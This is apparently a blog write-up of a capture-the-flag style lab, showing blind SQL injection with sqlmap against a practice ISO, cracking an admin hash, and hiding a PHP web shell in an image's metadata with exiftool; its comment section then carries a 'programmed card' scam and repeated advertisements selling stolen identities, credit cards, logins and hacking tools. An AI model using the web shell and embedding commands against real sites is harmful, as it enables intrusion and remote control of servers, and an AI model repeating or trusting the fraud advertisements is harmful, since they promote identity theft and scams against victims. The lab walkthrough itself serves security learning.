before get into the business, let me explain about what is blind sql injection . Blind SQL injection is identical to normal SQL Injection except that when an attacker attempts to exploit an application rather then getting a useful error message they get a generic page specified by the developer instead..(http://www.cgisecurity.com/questions/blindsql.shtml)
so basically we don't try to search any error message so the back end of the database but we actually asks the database true or false questions and determines the answer based on the applications response. just like guessing game it more difficult compare to sql injection but even if the database error messages are turned off a hacker can still run a blind SQL injection attack.
set up all necessary tools
-Kali Linux (https://www.kali.org/)
-ISO Image of SQL Injection Lab (from_sqli_to_shell_II_i386.iso)
if you successfully run the ISO image type "ifconfig" to see the web ip address and type the ip address into your browser and i will load the webpage
this is one of the page that is web page have.
before do blind sql injection lets try to do a fingerprinting. in fingerprinting i use netcat and telnet(to crosscheck)
well as you can see the server that they using is nginx /0.7.67 and also use burpsuite and nmap to see the open port and to map the application but yeah i forgot to screenshoot the burpsuite
as you can see the os that they use linux 2.6.32 and only port 80 that is open and so from the list of the structure the web application . i actually try all the link of the web application to see if it vulnerable to blind sql injection using sqlmap
after a few couple of trial and error i find one link that is vulnerable blind sql injection which is "http://172.16.139.137/show.php"
now from this we know that there are two database information_schema and photoblog. now let's try to see the content of the photoblog table.
now from the photoblog database we can see that there is 4 table now we focus on the users table because it will contain username and password
now from content of the table there are only one user which is admin but the password was hash. but you can actually use dictionary base attack to so real content of the hash
ahah! now from this we get the username and the password. go to the admin page and enter the password.
as you can see we finally take over the admin account. from here you can actually put a backdoor inside using php to execute the command. but in the administration page you can actually just store a picture inside the database so how to conceal backdoor inside the picture. well there is actually a lot of way to create but in this tutorial i use exiftool.
tool can inject the php code inside the image. simple code to create backdoor using php
"<?php $cmd=$_GET ['cmd'] ; system ($cmd); ?>"
i suggest you not separate the code into each line because when i try that the backdoor is not work.
now try to download any image an type this in order to create backdoor
"exiftool "-comment<=backdoor.php" image.png"
if it succeed you can remotely execute cmd command like this
well in order to see the content click "view page source"
as you can see the backdoor is successfully injected to the web application pretty cool heehhhh!for suggestion try to update your sqlmap to give much satisfying result i run an older sqlmap for two days is not working
have a great day ^_^
BalasHapusGood Post. I like your blog. Thanks for Sharing Information and good information.
Ethical Hacking Training in Delhi
Nice Blog..
BalasHapusVisit: Ethical Hacking Course
one of the great blog with great information.
BalasHapushttps://mcpm.hatenablog.com/
If you are in need of financial Help, don't hesitate to place an order for a program card that can withdraw any amount you want. Deserve Cards are very transparent and easy to deal with. You can Purchase Deserve cards that can withdraw up to $50,000 to $100,000 limit without being detected because of the programming of the card. I'm extremely grateful to them for being honest with their words and delivering the card to me. This is the third day of receiving the card and I have withdrawn $9,500 from the Deserve Programmed Card. I tried purchasing the card previously from someone else, but it never arrived until I tried skylink technology for those in need of more money, you can also contact them. you can place order for the card Via whatsapp +1(213)785-1553 or their Email: skylinktechnes@yahoo.com
BalasHapusFULLZ AVAILABLE WITH HIGH CREDIT SCORES 700+
BalasHapus(Spammed From Credit Bureau of USA)
=>Contact 24/7<=
Telegram> @leadsupplier
ICQ> 752822040
Email> exploit.tools4u@gmail.com
FRESHLY SPAMMED
VALID INFO WITH VALID DL EXPIRIES
*All info included*
NAME+SSN+DOB+DL+DL-STATE+ADDRESS
Employee & Bank details included
CC & CVV'S ONLY USA $8 FOR EACH
$1 for SSN+DOB
$2 for SSN+DOB+DL
$5 for High credit fullz 700+
(bulk order negotiable)
*Payment in all crypto currencies will be accepted
->You can buy few for testing
->Invalid or wrong info will be replaced
->Serious buyers needed for long term
->Very fast delivery
PLEASE DON'T ASK ANYTHING FOR FREE
TOOLS & TUTORIALS AVAILABLE FOR SPAMMING & HACKING
(Carding, spamming, hacking, scam page, Cash outs, dumps cash outs)
SQL Injector = 250$
Premium Accounts (Netflix, coinbase, FedEx, Pornhub, etc) =25$
Paypal Logins = 150$ (10 Logins)
Bitcoin Cracker = 500$
SMTP Linux Root = 300$
DUMPS with pins track 1 and 2 = 85$
Socks, rdp's, vpn = 25$
Php mailer = 25$
Server I.P's = 100$ (1k ip's)
HQ Emails with passwords = 100$ (1k emails+pass)
*If you need a valid vendor it's very prime chance, you'll never be disappointed*
Telegram> @leadsupplier
ICQ> 752822040
Email> exploit.tools4u@gmail.com
FULLZ AVAILABLE WITH HIGH CREDIT SCORES 700+
BalasHapus(Spammed From Credit Bureau of USA)
=>Contact 24/7<=
Telegram> @leadsupplier
ICQ> 752822040
Email> exploit.tools4u@gmail.com
FRESHLY SPAMMED
VALID INFO WITH VALID DL EXPIRIES
*All info included*
NAME+SSN+DOB+DL+DL-STATE+ADDRESS
Employee & Bank details included
CC & CVV'S ONLY USA $8 FOR EACH
$1 for SSN+DOB
$2 for SSN+DOB+DL
$5 for High credit fullz 700+
(bulk order negotiable)
*Payment in all crypto currencies will be accepted
->You can buy few for testing
->Invalid or wrong info will be replaced
->Serious buyers needed for long term
->Very fast delivery
PLEASE DON'T ASK ANYTHING FOR FREE
TOOLS & TUTORIALS AVAILABLE FOR SPAMMING & HACKING
(Carding, spamming, hacking, scam page, Cash outs, dumps cash outs)
SQL Injector = 250$
Premium Accounts (Netflix, coinbase, FedEx, Pornhub, etc) =25$
Paypal Logins = 150$ (10 Logins)
Bitcoin Cracker = 500$
SMTP Linux Root = 300$
DUMPS with pins track 1 and 2 = 85$
Socks, rdp's, vpn = 25$
Php mailer = 25$
Server I.P's = 100$ (1k ip's)
HQ Emails with passwords = 100$ (1k emails+pass)
*If you need a valid vendor it's very prime chance, you'll never be disappointed*
Telegram> @leadsupplier
ICQ> 752822040
Email> exploit.tools4u@gmail.com